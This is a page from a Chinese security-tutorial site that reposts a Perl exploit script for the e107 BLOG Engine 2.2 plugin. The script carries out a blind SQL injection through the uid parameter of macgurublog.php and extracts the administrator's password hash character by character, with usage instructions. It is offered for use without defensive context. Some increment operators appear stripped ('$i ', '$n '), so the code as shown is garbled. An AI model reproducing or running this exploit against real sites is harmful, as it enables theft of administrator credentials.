• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit ,其中包含e107,running man e107,无限挑战e107,蓝慧e107,强心脏e107等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
#####################################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
# ..::virangar security team::.. #
# www.virangar.net #
# C0d3d BY:virangar security team ( hadihadi ) #
#special tnx to: #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
#& all virangar members & all hackerz #
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
# ..:::Young Iranina Hackerz::.. #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)
#this code is for english e107's only,if you want work on other languages,you can edit line 67;) use HTTP::Request;
use LWP::UserAgent; if (@ARGV != 1){
header();
} $host = $ARGV[0]; print "\n md5 Password:\r\n";
&halghe();
print "\n[ ]Done\n";
sub halghe {
for($i = 1; $i <= 32; $i ){
$f = 0;
$n = 48;
while(!$f && $n <= 57)
{
if(&inject($host, $i, $n,)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n ;
}
if(!$f){
$n=97;
while(!$f && $n <= 102)
{
if(&inject($host, $i, $n,)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n ;
}}
}
}
sub inject {
my $site = $_[0];
my $a = $_[1];
my $b = $_[2]; $col = "user_password"; $attack= "$site"." and substring((select "."$col"." from e107_user where user_id=1 limit 0,1),"."$a".",1)=char("."$b".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content; if ($res !~ /The user has hidden their blog./i){
return 1;
} }
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
# (just for english e107's) #
# www.virangar.net #
# Useage: perl $0 Host #
# #
# Host: full patch to macgurublog.php uid (dont forget http://) #
# #
# Example: #
# perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5 #
# #
###################################################################
};
}

</div>

您可能想查找下面的文章:

  • e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

相关文章

  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Sun xVM VirtualBox
  • Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
  • Ultrastats
  • The Personal FTP Server 6.0f RETR Denial of Service Exploit
  • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
  • GeekLog
  • webEdition CMS (we_objectID) Blind SQL Injection Exploit
  • pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
  • jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • MS Internet Explorer Recordset Double Free Memory Exploit
    • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
    • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
    • The Personal FTP Server 6.0f RETR Denial of Service Exploit
    • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
    • Maian Cart 1.1 Insecure Cookie Handling Vulnerability
    • BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
    • BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
    • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
    • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有